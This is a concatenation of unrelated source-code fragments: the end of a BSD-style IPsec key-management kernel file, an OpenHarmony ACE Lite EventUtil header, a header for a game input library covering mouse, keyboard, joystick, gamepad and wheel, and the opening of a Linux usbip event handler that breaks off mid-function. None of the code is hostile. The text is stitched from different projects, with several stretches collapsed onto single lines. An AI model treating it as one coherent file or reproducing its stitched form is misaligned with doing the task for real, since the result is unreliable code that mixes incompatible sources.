*/ static const char * key_getfqdn(void) { int i; int hasdot; static char fqdn[MAXHOSTNAMELEN + 1]; if (!hostnamelen) return NULL; /* check if it comes with domain name. */ hasdot = 0; for (i = 0; i < hostnamelen; i++) { if (hostname[i] == '.') hasdot++; } if (!hasdot) return NULL; /* NOTE: hostname may not be NUL-terminated. */ bzero(fqdn, sizeof(fqdn)); bcopy(hostname, fqdn, hostnamelen); fqdn[hostnamelen] = '\0'; return fqdn; } /* * get username@FQDN for the host/user. */ static const char * key_getuserfqdn(void) { const char *host; static char userfqdn[MAXHOSTNAMELEN + MAXLOGNAME + 2]; struct proc *p = curproc; char *q; if (!p || !p->p_pgrp || !p->p_pgrp->pg_session) return NULL; if (!(host = key_getfqdn())) return NULL; /* NOTE: s_login may not be-NUL terminated. */ bzero(userfqdn, sizeof(userfqdn)); bcopy(p->p_pgrp->pg_session->s_login, userfqdn, MAXLOGNAME); userfqdn[MAXLOGNAME] = '\0'; /* safeguard */ q = userfqdn + strlen(userfqdn); *q++ = '@'; bcopy(host, q, strlen(host)); q += strlen(host); *q++ = '\0'; return userfqdn; } #endif /* record data transfer on SA, and update timestamps */ void key_sa_recordxfer(struct secasvar *sav, struct mbuf *m) { KASSERT(sav != NULL, ("key_sa_recordxfer: Null secasvar")); KASSERT(m != NULL, ("key_sa_recordxfer: Null mbuf")); if (!sav->lft_c) return; /* * XXX Currently, there is a difference of bytes size * between inbound and outbound processing. */ sav->lft_c->sadb_lifetime_bytes += m->m_pkthdr.len; /* to check bytes lifetime is done in key_timehandler(). */ /* * We use the number of packets as the unit of * sadb_lifetime_allocations. We increment the variable * whenever {esp,ah}_{in,out}put is called. */ sav->lft_c->sadb_lifetime_allocations++; /* XXX check for expires? */ /* * NOTE: We record CURRENT sadb_lifetime_usetime by using wall clock, * in seconds. HARD and SOFT lifetime are measured by the time * difference (again in seconds) from sadb_lifetime_usetime. 
* * usetime * v expire expire * -----+-----+--------+---> t * <--------------> HARD * <-----> SOFT */ sav->lft_c->sadb_lifetime_usetime = time_second; /* XXX check for expires? */ return; } /* dumb version */ void key_sa_routechange(struct sockaddr *dst) { struct secashead *sah; struct route *ro; LIST_FOREACH(sah, &sahtree, chain) { ro = &sah->sa_route; if (ro->ro_rt && dst->sa_len == ro->ro_dst.sa_len && bcmp(dst, &ro->ro_dst, dst->sa_len) == 0) { RTFREE(ro->ro_rt); ro->ro_rt = NULL; } } return; } static void key_sa_chgstate(struct secasvar *sav, u_int8_t state) { if (sav == NULL) panic("key_sa_chgstate called with sav == NULL"); if (sav->state == state) return; if (__LIST_CHAINED(sav)) LIST_REMOVE(sav, chain); sav->state = state; LIST_INSERT_HEAD(&sav->sah->savtree[state], sav, chain); } void key_sa_stir_iv(struct secasvar *sav) { if (!sav->iv) panic("key_sa_stir_iv called with sav == NULL"); key_randomfill(sav->iv, sav->ivlen); } /* XXX too much? */ static struct mbuf * key_alloc_mbuf(int l) { struct mbuf *m = NULL, *n; int len, t; len = l; while (len > 0) { n = m_getb(len, MB_DONTWAIT, MT_DATA, 0); if (!n) { m_freem(m); return NULL; } n->m_len = 0; n->m_len = M_TRAILINGSPACE(n); /* use the bottom of mbuf, hoping we can prepend afterwards */ if (n->m_len > len) { t = (n->m_len - len) & ~(sizeof(long) - 1); n->m_data += t; n->m_len = len; } len -= n->m_len; if (m) m_cat(m, n); else m = n; } return m; }
/* * Copyright (c) 2021 Huawei Device Co., Ltd. * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #ifndef OHOS_ACELITE_EVENT_UTIL_H #define OHOS_ACELITE_EVENT_UTIL_H #include "non_copyable.h" #include "ui_view.h" #include "wrapper/js.h" namespace OHOS { namespace ACELite { struct CallbackParams : public MemoryHeap { JSValue vm; JSValue fn; JSValue arg; }; class EventUtil final : public MemoryHeap { public: ACE_DISALLOW_COPY_AND_MOVE(EventUtil); /** * @brief Create a JAVASCRIPT plain object that is used as the input parameter of * the callback function for click or longpress event. */ static JSValue CreateEvent(const char *type, UIView &view, const Event &event); /** * @brief Create a JAVASCRIPT plain object that is used as the input parameter of * the callback function for swipe event. */ static JSValue CreateSwipeEvent(UIView &view, const DragEvent &event); /** * @brief Invoke the callback function of event. */ static void InvokeCallback(JSValue vm, JSValue callback, JSValue event, const void *context = nullptr); static const char *EVENT_CLICK; static const char *EVENT_LONGPRESS; static const char *EVENT_SWIPE; private: EventUtil() {} ~EventUtil() {} /** * @brief Get the DOM element that is reference to view */ static JSValue GetElementByUIView(UIView *view); }; } // namespace ACELite } // namespace OHOS #endif // OHOS_ACELITE_EVENT_UTIL_H
#pragma once

// mode variable for each HID (human input device):
//   keyboard:  [MODE1] OS events (default)  [MODE2] manual update() (N/A on linux)  [MODE3] directinput  [MODE4] windows raw data (N/A)
//   mouse:     [MODE1] OS events (default)  [MODE2] manual update() using different funcs  [MODE3] direct input (win)
//   joystick:  j[0-7]  sys driver   j[8-15]  directinput / N/A / N/A   j[16-19]  xinput / N/A / N/A
//   gamepad:   gp[0-7] sys driver   gp[8-15] directinput / N/A / N/A   gp[16-19] xinput / N/A / N/A
//   gamewheel: gw[0-7] sys driver   gw[8-15] directinput / N/A / N/A   gw[16-19] xinput / N/A / N/A
// [internal workings]: joysticks / gamepads / gamewheels share the direct input, xinput and OS drivers.
// In keyboard [MODE 2&3] key states when pressed hold either 129 or 128 — test with key[] & 0x80
// (it might be good to extend this convention to all modes).
// In keyboard [MODE 1] windows doesn't send keyup if both rshift and lshift are pressed (same for
// alt and control) — NOT RELIABLE for those keys.
// In keyboard [MODE 2] the update happens when a key is pressed, from a windows message; to change
// that, comment the keyboard-update lines in processMSG() and call update() manually.
// In keyboard [MODE 3] update must be done manually in a loop (with update()).
//
// *more USAGE stuff*
// 1. check the joystick/gamepad/gamewheel mode first: if it's 0 there is no HID present and
//    activating it does nothing.
// 2. every joystick/gamepad/gamewheel must be activated first, to signal osiInput::update() to
//    update its values — simply call j/gp/gw[n].activate().
// GAMEPAD BUTTON PRESSUREs 20-23 are the dPad button pressures.
// TODO list is in the cpp file.

#define MAX_KEYBOARD_KEYS 256
#define MAX_MOUSE_BUTTONS 16
#define MAX_JOYSTICK_BUTTONS 32
#define MAX_KEYS_LOGGED 16
#define MAX_JOYSTICKS 20      /// nr of maximum joysticks/gamepads/gamewheels, NOT JUST JOYSTICKS

// --------------============= MOUSE CLASS ============--------------
///==================================================================
class osiMouse {
public:
  // USAGE / settings
  int8_t mode;            // [MODE 1]: OS events (default) - works on every OS
                          // [MODE 2]: manual update() using different funcs (not working under linux/mac yet)
                          // [MODE 3]: win(direct input) / linux(n/a) / mac(n/a)

  // position
  int x, y;               // current mouse position
  //int vx, vy;           // current mouse position on the virtual desktop (kept out: x&y would become window coords)
  int oldx, oldy;         // old mouse position since last in.update() call
  int dx, dy;             // mouse delta movement since last in.update() call

  // wheel (wheels can have exact axis values — worth another look)
  int wheel;              // wheel delta rotation in units since last in.update() call

  // buttons
  struct osiMouseButton {
    uint64_t lastDT;        // last button press delta time in milisecs
    uint64_t lastTimeStart; // last button press start time
    uint64_t lastTimeEnded; // last button press end time
    bool down;              // button is currently pressed
    uint64_t timeStart;     // time @ button down start
    osiMouseButton(): lastDT(0), lastTimeStart(0), lastTimeEnded(0), down(false), timeStart(0) {};
  } but[MAX_MOUSE_BUTTONS];

  // funcs
  bool init(int8_t mode);   // init the mouse (usually better to call in.init(..) instead)
  void update();            // if not using mode 1, update mouse values with this
  bool activate();          // activates the mouse after an alt-tab or on app start
  bool unactivate();        // init needed when the application loses focus
  bool grab();              // constrain the mouse to the window boundaries
  bool ungrab();            // let the mouse roam free
  void setPos(int, int);    // sets the mouse position
  void resetButtons();      // resets all buttons (e.g. on alt-tab)

  // constructors / destructors
  osiMouse();
  ~osiMouse();
  void delData();

  int _twheel;              // to be changed to the new mac processMSG (move to private)
private:
  bool _bActive, _bGrabbed;
  friend bool _processMSG(void);
  friend class osiInput;
  friend class osinteraction;
#ifdef OS_WIN
  //friend LRESULT CALLBACK _processMSG(HWND, UINT, WPARAM, LPARAM);
#ifdef USING_DIRECTINPUT
  void *_diDevice;          // DirectInput device handle
  struct {
    long lX, lY, lZ;
    unsigned char rgbButtons[8];
  } _diStats;               // raw DirectInput mouse state
#endif /// USING DIRECT INPUT
#endif /// OS_WIN
};

// --------------============= KEYBOARD CLASS ============--------------
///=====================================================================
class osiKeyboard {
public:
  int8_t mode;              // [MODE1]: OS events (default) [MODE2]: manual update() [MODE3]: directinput [MODE4]: windows raw data

  /// use Input::Kv structure to find a certain key. EX: in.k.key[Kv.enter] is the enter key status
  uint8_t *key;             // all keys' button status; points to buffer1/buffer2 (buffers are swapped, no copying)
  uint64_t keyTime[MAX_KEYBOARD_KEYS]; // time @ key started to be pressed
  uint8_t *lastCheck;       // key states at the previous check; points to one of the buffers

  bool capsLock, scrollLock, numLock;  // the 3 toggle locks (foreign keyboards may have other 'locks')
  bool insertLock;          // insert behaves like any 'lock' key

  struct osiKeyLog {
    int32_t code;           // scan code of the keyboard key (Input::Kv has all per-OS key codes)
    bool checked;           // checked & lastKey[] used for mortal-kombat-style combo checks
    uint64_t timeDown;      // exact time when key was pressed
    uint64_t timeUp;        // exact time when key was released - can be 0, meaning still pressed
    uint64_t timeDT;        // how long the key was pressed (timeUp-timeDown) - 0 means still pressed
    osiKeyLog(const osiKeyLog &o): code(o.code), checked(o.checked), timeDown(o.timeDown), timeUp(o.timeUp), timeDT(o.timeDT) {};
    osiKeyLog(): code(0), checked(false), timeDown(0), timeUp(0), timeDT(0) {}
  } lastKey[MAX_KEYS_LOGGED]; // history of keys pressed, with press/release times for combo checks

  // character input / character manipulation keys (enter/arrows/del/etc)
  class chTyped: public segData { // uses the segment chainlist class (segList.cpp/h)
  public:
    uint32_t c;             // character typed (unicode); call getChar() to pop the first typed char
    uint64_t time;          // time when the character was typed
  };
  /// charTyped.nrNodes holds the nr of chars waiting to be processed (auto-deleted after ~1-2s if unread)
  segList charTyped;        // list with typed chars; dimensions: [size:32, unitsize sizeof(chTyped)]
  //segList manipTyped;     // [MOVED INSIDE charTyped - NO NEED FOR 2 LISTS]

  /// the main functions to call to get a char / string manip char
  uint32_t getChar();       // returns a typed character or 0 if none (call until 0, or per charTyped.nrNodes)
  //uint32_t getManip();    // [MOVED TO getChar() - NO NEED FOR 2 LISTS]
  void clearTypedBuffer();  // clears all character buffers, usually on switching input boxes/controls

  // funcs
  void update();            // MAIN LOOP FUNC: updates key[] / lastCheck[] (prefer in.update())
  void resetButtons();      // call after losing focus; also fixes the pressed-key history (lastKey[])
  bool activate();          // init on alt-tab or program start (in.init() activates everything); may be a no-op
  bool unactivate();        // called after app loses focus; may be a no-op
  bool grab();              // DANGER: exclusive keyboard control; if the program halts the whole system can lose the keyboard. AVOID!
  bool ungrab();            // ungrab the keyboard - better to avoid grabbing at all
  void updateLocks();       // updates caps/num/scroll locks; autocalled by the system event handler
                            // <<< SOME KEYBOARDS NEED THIS UPDATED FOR SPECIAL LOCK KEYS >>>

  // --- NOTHING TO BOTHER from this point on (usually) ---
  bool init(int8_t mode= 1);                       // see 'mode'; inits direct input if asked; else use Input::init()
  void _log(const osiKeyLog &);                    // [internal] push a key into the key history
  void _addChar(uint32_t c, uint64_t *time);       // [internal] used by WM_CHAR message handling
  //void _addManip(uint32_t c, uint64_t *time);    // REMOVED - ONLY ONE LIST
  void _checkAndAddUnicode(uint32_t in_char);      // [internal] OSchar.cpp: add unicode char/manip to charTyped
  void _checkKeyManip(uint32_t in_keyCode);        // [internal] OSchar.cpp: add manip key to charTyped
  void removeOldChars(uint64_t in_howOld= 1000);   // [milisecs] drop unread chars from charTyped
  inline void swapBuffers();                       // swaps key/lastKey pointers (no copying)

  osiKeyboard();
  ~osiKeyboard();
  void delData();           /// standard dealloc func / called by destroyer

private:
  bool _bActive, _bGrabbed;
  friend class osiInput;
  uint8_t _buffer1[MAX_KEYBOARD_KEYS], _buffer2[MAX_KEYBOARD_KEYS]; /// backing storage for key/lastCheck; swapped by pointer
#ifdef OS_WIN
#ifdef USING_DIRECTINPUT
  void *_diDevice;
#endif /// USING_DIRECTINPUT
#endif /// OS_WIN

  // TESTING
  int16_t getFirstKey();
  void printPressed();      // to be or not to be - THIS REALLY SEEMS USELESS (31.01.2014) maybe if extending to ps4/xbone...
  // uint repeat[256];                                              /// how many times a character was repeated
  // inline int getRepeat(int key) { uint t= repeat[key]; repeat[key]= 0; return t; }
  // these might be useless ^^^
  // /TESTING
};

// One entry of a joystick/gamepad/gamewheel button-press history.
struct osiButLog {
  uint8_t but;              /// button number
  bool checked;             /// helper flag free for user code; reset to false when a new key is logged (osi ignores it)
  uint64_t timeDown, timeUp, timeDT; /// timeDown: press time; timeUp: release time (0 = still pressed); timeDT: press duration
  osiButLog(const osiButLog &o): but(o.but), checked(o.checked), timeDown(o.timeDown), timeUp(o.timeUp), timeDT(o.timeDT) {};
  osiButLog():but(0), checked(false), timeDown(0), timeUp(0), timeDT(0) {}
};

#ifdef OS_MAC
#include <mutex>
#endif

class osiGamePad;
class osiGameWheel;

// --------------============= JOYSTICK CLASS ============--------------
///=====================================================================
class osiJoystick {
public:
  // CONFIGURATION
  int8_t mode;              // [MODE0]: disabled, can (and should) check against this
                            // [MODE1]: OS native
                            // [MODE2]: win(directinput) / linux(n/a) / mac(n/a)
                            // [MODE3]: win(xinput) / linux(n/a) / mac(n/a)
  str8 name;                // joystick name (product name)
  int16_t maxButtons;       // nr of buttons the stick has

  // AXIS
  int32_t x, y;             // [-32767 0 +32767] main stick x and y axis
  int32_t x2, y2;           // [-32767 0 +32767] second stick x and y axis (reserved)
  int32_t throttle;         // [-32767 0 +32767] 3rd axis, usually throttle
  int32_t rudder;           // [-32767 0 +32767] 4th axis, usually rudder
  int32_t u, v;             // [-32767 0 +32767] fifth/sixth axis (reserved; some sticks may use them)
  int32_t pov;              // [-1=null 0..+35999] POV angle in degrees*100 (0 to 35900)

  // BUTTONS state / history / everything
  uint8_t *but;             // buttons state
  uint8_t *butPrev;         // previous buttons state
  int32_t butPressure[MAX_JOYSTICK_BUTTONS]; // [0 +65534] button pressure; buttons 20-23 are POV pressure
  uint64_t butTime[MAX_JOYSTICK_BUTTONS];    // time @ button started to be pressed
  osiButLog butLog[MAX_KEYS_LOGGED];         // history of pressed/released buttons

  // FUNCTIONS
  bool activate();          // !! activates stick (enables value updates) & grabs exclusive control
  bool deactivate();        // deactivates & ungrabs exclusive control
  bool isActive() { return _bActive; }
  bool grab();              // exclusive control of the device (if possible)
  bool ungrab();            // release exclusive control
  void resetButtons();      // clears button buffers & the logged buttons (e.g. on alt-tab)
  void resetAxis();         // clears all stick axis values
  void update();            // MAIN UPDATE FUNC for stick/pad/wheel (Input::update() calls this when active)

  osiJoystick();
  ~osiJoystick();
  void delData();

  // private data from here on
private:
  friend class osiInput;
  friend class osinteraction;
  bool _bActive, _bGrabbed; // internal flags
  osiGamePad *_gp;          // linked gamepad - shares the same 'driver'
  osiGameWheel *_gw;        // linked gamewheel - shares the same 'driver'
  uint8_t _buffer1[MAX_JOYSTICK_BUTTONS], _buffer2[MAX_JOYSTICK_BUTTONS]; /// backing storage for but/butPrev; swapped by pointer
  inline void _swapBuffers();        // [internal] swaps button buffers
  void _log(const osiButLog &);      // [internal] push a button into the button history

  /// OS specific stuff
#ifdef OS_WIN
  int16_t _id;              // windows id (THIS MIGHT BE UNIVERSAL)
#ifdef USING_DIRECTINPUT    // primary
  friend BOOL CALLBACK _diDevCallback(void *, void *);
  void *_diDevice;
  //LPCDIDEVICEINSTANCE diID; // ID of the device; a newly plugged one will differ from current IDs
  struct _GUID {
    uint32_t Data1;
    uint16_t Data2, Data3;
    uint8_t Data4[8];
  } _diID;                  // ID of the device; a newly plugged one will differ from current IDs
  struct _DIJOYSTATE2 {
    int32_t lX, lY, lZ;             // x,y,z-axis position
    int32_t lRx, lRy, lRz;          // x,y,z-axis rotation
    int32_t rglSlider[2];           // extra axes positions
    uint32_t rgdwPOV[4];            // POV directions
    uint8_t rgbButtons[128];        // 128 buttons
    int32_t lVX, lVY, lVZ;          // x,y,z-axis velocity
    int32_t lVRx, lVRy, lVRz;       // x,y,z-axis angular velocity
    int32_t rglVSlider[2];          // extra axes velocities
    int32_t lAX, lAY, lAZ;          // x,y,z-axis acceleration
    int32_t lARx, lARy, lARz;       // x,y,z-axis angular acceleration
    int32_t rglASlider[2];          // extra axes accelerations
    int32_t lFX, lFY, lFZ;          // x-axis force
    int32_t lFRx, lFRy, lFRz;       // x-axis torque
    int32_t rglFSlider[2];          // extra axes forces
  } _diStats;
#endif /// USING_DIRECTINPUT
#ifdef USING_XINPUT
  // secondary; main joysticks probably use direct input
#endif /// USING_XINPUT
#endif /// OS_WIN
#ifdef OS_LINUX
  int32_t _jsFile;          // opened /dev/input/jsNNN file
  int16_t _jsID;            // /dev/input/jsNNN NNN= id
  int32_t _eventFile;       // opened /dev/input/eventNNN eventFile
  int16_t _eventID;         // /dev/input/eventNNN NNN= eventID
#endif
#ifdef OS_MAC
  //friend void _HIDchange(void *, IOReturn, void *, IOHIDValueRef);
public:
  /// transfers data from HID callback funcs (they can write at any moment - dangerous)
  struct _CallbackTame {
    int32_t x, y, x2, y2, throttle, rudder, u, v, pov;
    uint8_t but[MAX_JOYSTICK_BUTTONS];
    int32_t butPressure[MAX_JOYSTICK_BUTTONS];
    std::mutex mutex;       /// object lock system
    _CallbackTame() { delData(); }
    void delData() { x= y= x2= y2= throttle= rudder= u= v= 0; pov= -1; for(int a= 0; a< MAX_JOYSTICK_BUTTONS; a++) butPressure[a]= but[a]= 0; }
  } _cbTame;
private:
#endif
};

// --------------============= GAMEPAD CLASS ============--------------
///====================================================================
class osiGamePad {
  friend class osiInput;
  friend class osiJoystick;
public:
  // CONFIGURATION
  int8_t mode;              // [MODE0]: disabled, can check against this
                            // [MODE1]: OS native
                            // [MODE2]: win(directinput) / linux(n/a) / mac(n/a)
                            // [MODE3]: win(xinput) / linux(n/a) / mac(n/a)
  str8 name;                // gamepad name (product name)
  int16_t type;             // 0= ps3 compatible; 1= xbox compatible - user may change it in-game and the right axes still update
  int16_t maxButtons;       // nr of buttons the gamePad has

  // AXIS
  int32_t lx, ly;           // [-32767 0 +32767] stick 1 axis position (left)
  int32_t rx, ry;           // [-32767 0 +32767] stick 2 axis position (right)
  int32_t lt, rt;           // [0 +65534] left and right triggers
  int32_t u, v;             // [-32767 0 +32767] extra axis - updated but usually not used
  int32_t pov;              // [-1=null 0..+35900] POV angle *100 (-1 usually means not pressed)

  // BUTTONS state / history
  uint8_t *but;             // buttons state
  uint8_t *butPrev;         // previous buttons state
  int32_t butPressure[MAX_JOYSTICK_BUTTONS]; // [0 +65534] button pressure; buttons 20-23 are POV pressure
  uint64_t butTime[MAX_JOYSTICK_BUTTONS];    // time @ button started to be pressed
  osiButLog butLog[MAX_KEYS_LOGGED];         // history of pressed/released buttons

  // functions (all delegate to the linked osiJoystick, which owns the driver)
  bool activate() { return _j->activate(); }     // !! activates pad (enables updates) & grabs exclusive usage
  bool deactivate() { return _j->deactivate(); } // deactivates & ungrabs device
  void resetButtons();      // clears button buffers & logged buttons (e.g. on alt-tab)
  void resetAxis();         // resets all gamepad axes to 0 / null position
  void update() { _j->update(); }                // manually update the gamepad variables
  bool grab() { return _j->grab(); }             // exclusive control of the device (if possible)
  bool ungrab() { return _j->ungrab(); }         // release exclusive control

  osiGamePad();
  ~osiGamePad();
  void delData();

  // internals from here on
private:
  osiJoystick *_j;          // linked Joystick class
  void _log(const osiButLog &); // [internal] push a button into the button history
  uint8_t _buffer1[MAX_JOYSTICK_BUTTONS], _buffer2[MAX_JOYSTICK_BUTTONS]; // backing storage for but/butPrev; swapped by pointer
  inline void _swapBuffers();
#ifdef OS_MAC
  //friend void HIDchange(void *, IOReturn, void *, IOHIDValueRef);
#endif
};

// --------------============= GAMEWHEEL CLASS ============--------------
///======================================================================
// NOTE: class continues past this file chunk - declaration is truncated here.
class osiGameWheel {
  friend class osiInput;
  friend class osiJoystick;
public:
  // CONFIGURATION
  int16_t mode;             // [MODE0]: disabled, can check against this
                            // [MODE1]: OS native
                            // [MODE2]: win(directinput) / linux(n/a) / mac(n/a)
                            // [MODE3]: win(xinput) / linux(n/a) / mac(n/a)
  str8 name;                // wheel name (product name)
  int16_t maxButtons;       // nr of buttons the gameWheel has

  // AXIS
  int32_t wheel;            // [-32767 0 +32767] the wheel
  int32_t a1, a2, a3, a4, a5; // [-32767 0 +32767] different axes (more work must be done here)
  // a pov??
// THIS NEEDS MORE WORK <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< // BUTTONS state / history uint8_t *but; // buttons state uint8_t *butPrev; // holds previous buttons state int32_t butPressure[MAX_JOYSTICK_BUTTONS];// [0 +65534] button pressure (how hard a button is pressed) buttons 20-23 are pressure on the pov uint64_t butTime[MAX_JOYSTICK_BUTTONS]; // time @ key started to be pressed osiButLog butLog[MAX_KEYS_LOGGED]; // history of pressed buttons // functions bool activate() { return _j->activate(); } // !! activates wheel, signaling to update it's data values & grabbing exclusive usage bool deactivate() { return _j->deactivate(); } // deactivates & ungrabs device void resetButtons(); // clears all button buffers & resets history (used in case of alt-tab or something similar) void resetAxis(); // resets all gamewheel axis to 0 / null position void update() { _j->update(); } // updates internal vals; calling Input::update() is better, but each stick can be updated manually bool grab() { return _j->grab(); } // exclusive control of the device (if possible) bool ungrab() { return _j->ungrab(); }// lose exclusive control of the device osiGameWheel(); ~osiGameWheel(); void delData(); private: osiJoystick *_j; // linked Joystick class uint8_t _buffer1[MAX_JOYSTICK_BUTTONS], _buffer2[MAX_JOYSTICK_BUTTONS]; // used for the key / lastCheck. 
buffers are swapped with pointers, so no copying is involved void _log(const osiButLog &); // [internal] puts the last button in the last button-history (it logs imediatly when a button is down) inline void _swapBuffers(); #ifdef OS_MAC //friend void _HIDchange(void *, IOReturn, void *, IOHIDValueRef); #endif }; // -these are key codes; they are updated with _Kv.populate()- it is auto-called in in.populate() // -they are OS independant, and if the user switches a keyboard/ system changes keyboard locals // another call to in.populate() should update the key code vals - THESE CODES ARE THE SAME ON EVERY KEYBOARD ON EARTHl // SO THIS IS NOT TRUE (i think) - problem is that a few keys might be on a different FIZICAL position (european keyboards usually) // -v comes from 'variable' // -only the most inportant keyboard keys are in this struct. // (there is no 'play' button on some crappy keyboard manufacturer) // -on some keyboards, SOME of these keys MIGHT NOT EXIST!!!! struct _Kv { uint8_t esc, enter, kpenter, tab, space, backspace, insert, del, home, end, pgup, pgdown, rshift, lshift, rctrl, lctrl, ralt, lalt, f1, f2, f3, f4, f5, f6, f7, f8, f9, f10, f11, f12, left, up, right, down, prtsc, pause, capslock, scrolllock, numlock, q, w, e, r, t, y, u, i, o, p, a, s, d, f, g, h, j, k, l, z, x, c, v, b, n, m, n1, n2, n3, n4, n5, n6, n7, n8, n9, n0, kp1, kp2, kp3, kp4, kp5, kp6, kp7, kp8, kp9, kp0, minus, equal, backslash, lbracket, rbracket, semicolon, apostrophe, // should apostrophe be quote? comma, dot, slash, grave, kpslash, kpmultiply, kpminus, kpplus, kpequal, kpdel, // dot= period lOS, rOS, menu; /// left win key, right win key, propreties key void populate(); /// updates all these vars. 
SOURCE CODE IN "OSchar.cpp" }; // ================================================================== // // --------------============= INPUT CLASS ============-------------- // // ================================================================== // class osiInput { public: osiMouse m; // the main mouse class osiKeyboard k; // the main keyboard class osiJoystick j[MAX_JOYSTICKS]; // j[0-7]= OS driver; j[8-15] XINPUT; j[16-19] DIRECT INPUT osiGamePad gp[MAX_JOYSTICKS]; // gp[0-7]= OS driver; gp[8-15] XINPUT; gp[16-19] DIRECT INPUT osiGameWheel gw[MAX_JOYSTICKS]; // gw[0-7]= OS driver; gw[8-15] XINPUT; gw[16-19] DIRECT INPUT _Kv Kv; // struct with most inportant keycodes: in.k.key[Kv.space] is possible. OS independant/ if keyboard is changed in any way, just call Kv.populate() // each driver type name (EX: j[0].mode==1 -> system default driver j[8].mode== 2 -> Direct Input handled) str8 mode1Name; // under all systems, this is 'System Handled' or 'System Default' <<<<<<<<<<<<<<<<<<< CHOSE A GOOD NAME str8 mode2Name; // under windows, this should be 'DirectInput', under the others 'Not Used' str8 mode3Name; // under windows, this should be 'XInput', under the others 'Not Used' struct InputNumbers { int16_t jFound; // nr of joysticks found on system in total (for win, os+directinput+xinput) int16_t gpFound; // nr of gamepads found on system int16_t gwFound; // nr of gamewheels found on system int16_t jOS; // (max 8) nr of normal driver joysticks found int16_t gpOS; // (max 8) nr of normal driver joysticks found int16_t gwOS; // (max 8) nr of normal driver joysticks found int16_t jT2; // (max 8) nr of directinput joysticks found (nothing in linux/mac, but the code will compile) int16_t gpT2; // (max 8) nr of directinput gamepads found (nothing in linux/mac, but the code will compile) int16_t gwT2; // (max 8) nr of directinput gamewheels found (nothing in linux/mac, but the code will compile) int16_t jT3; // (max 4) nr of xinput joysticks found (nothing in linux/mac, but 
the code will compile) int16_t gpT3; // (max 4) nr of xinput gamepads found (nothing in linux/mac, but the code will compile) int16_t gwT3; // (max 4) nr of xinput gamewheels found (nothing in linux/mac, but the code will compile) } nr; // all different numbers of HID found inline osiJoystick *getT2j (int16_t nr) { return &j[8+ nr]; } // [win type2 = direct input] [linux= nothig] [mac= nothig] inline osiGamePad *getT2gp(int16_t nr) { return &gp[8+ nr]; } // [win type2 = direct input] [linux= nothig] [mac= nothig] inline osiGameWheel *getT2gw(int16_t nr) { return &gw[8+ nr]; } // [win type2 = direct input] [linux= nothig] [mac= nothig] inline osiJoystick *getT3j (int16_t nr) { return &j[16+ nr]; } // [win type3= xinput] [linux= nothig] [mac= nothig] inline osiGamePad *getT3gp(int16_t nr) { return &gp[16+ nr]; } // [win type3= xinput] [linux= nothig] [mac= nothig] inline osiGameWheel *getT3gw(int16_t nr) { return &gw[16+ nr]; } // [win type3= xinput] [linux= nothig] [mac= nothig] // functions bool init(int mMode= 1, int kMode= 1); // must be called after a main window is created (see 'mode' variable for mouse & keyboard for more customization) void populate(bool scanMouseKeyboard= false); // searches for joysticks / other HIDs void update(); // update everything (mouse& keyboard& sticks& pads& wheels) void resetPressedButtons(); // in case of ALT-TAB, all buttons/timers must be reset, to avoid bugs!!! void resetAxis(); // resets all HID axis (sticks/pads/wheels) osiInput(); ~osiInput(); void delData(); // private (internal) stuff from here on private: friend class osinteraction; friend class osiMouse; friend class osiKeyboard; uint64_t _lastPopulate; #ifdef OS_WIN #ifdef USING_DIRECTINPUT friend BOOL CALLBACK _diDevCallback(LPCDIDEVICEINSTANCE, LPVOID); void *_dInput; #endif #endif /// OS_WIN #ifdef OS_LINUX // linux keysyms handling (keysyms make windows look good ffs) // these funcs are in <OSchar.cpp>, at the end of the file !!!!!!!!!!!!! 
void _keysym2unicode(KeySym *, uint32_t *ret); // converts keysym to unicode (no checks, use getUnicode) void _getUnicode(KeySym *, uint32_t *ret); // converts keysym to unicode, verifies that the character is valid #endif /// OS_LINUX #ifdef OS_MAC // MAC MESS <<<--------------- NOTHING TO BOTHER HERE ------ // nothing to bother here, all internal vars void *_manager; // [internal] 'manager' that handles all HID devices (this one is set to handle sticks/pads/wheels only) #endif // END MAC MESS <<<----------------------------------------------- // TESTING void vibrate(); // TESTING ^^^^^^^^ }; extern osiInput in; // only 1 global class #define mPos(_x, _y, _dx, _dy) ((in.m.x>= (_x)) && (in.m.x<= ((_x)+ (_dx))) && (in.m.y>= (_y)) && (in.m.y<= ((_y)+ (_dy))))
// SPDX-License-Identifier: GPL-2.0+
/*
 * Copyright (C) 2003-2008 Takahiro Hirofuchi
 * Copyright (C) 2015 Nobuo Iwata
 */

#include <linux/kthread.h>
#include <linux/export.h>
#include <linux/slab.h>
#include <linux/workqueue.h>

#include "usbip_common.h"

/* One queued event-handling request for a usbip device. */
struct usbip_event {
	struct list_head node;
	struct usbip_device *ud;
};

/* event_lock protects event_list; per-device ud->lock protects ud->event. */
static DEFINE_SPINLOCK(event_lock);
static LIST_HEAD(event_list);

/* Set event bits on a device under its own lock. */
static void set_event(struct usbip_device *ud, unsigned long event)
{
	unsigned long flags;

	spin_lock_irqsave(&ud->lock, flags);
	ud->event |= event;
	spin_unlock_irqrestore(&ud->lock, flags);
}

/* Clear event bits on a device under its own lock. */
static void unset_event(struct usbip_device *ud, unsigned long event)
{
	unsigned long flags;

	spin_lock_irqsave(&ud->lock, flags);
	ud->event &= ~event;
	spin_unlock_irqrestore(&ud->lock, flags);
}

/*
 * Pop the next device with pending events off event_list, or NULL if the
 * list is empty.  The usbip_event wrapper is freed here; the caller only
 * gets the device pointer.
 */
static struct usbip_device *get_event(void)
{
	struct usbip_event *ue = NULL;
	struct usbip_device *ud = NULL;
	unsigned long flags;

	spin_lock_irqsave(&event_lock, flags);
	if (!list_empty(&event_list)) {
		ue = list_first_entry(&event_list, struct usbip_event, node);
		list_del(&ue->node);
	}
	spin_unlock_irqrestore(&event_lock, flags);

	if (ue) {
		ud = ue->ud;
		kfree(ue);
	}

	return ud;
}

/* Task that runs event_handler(); used by usbip_in_eh() to detect recursion. */
static struct task_struct *worker_context;

/* Workqueue callback: drain event_list, dispatching each device's events. */
static void event_handler(struct work_struct *work)
{
	struct usbip_device *ud;

	if (worker_context == NULL) {
		worker_context = current;
	}

	while ((ud = get_event()) != NULL) {
		usbip_dbg_eh("pending event %lx\n", ud->event);

		mutex_lock(&ud->sysfs_lock);
		/*
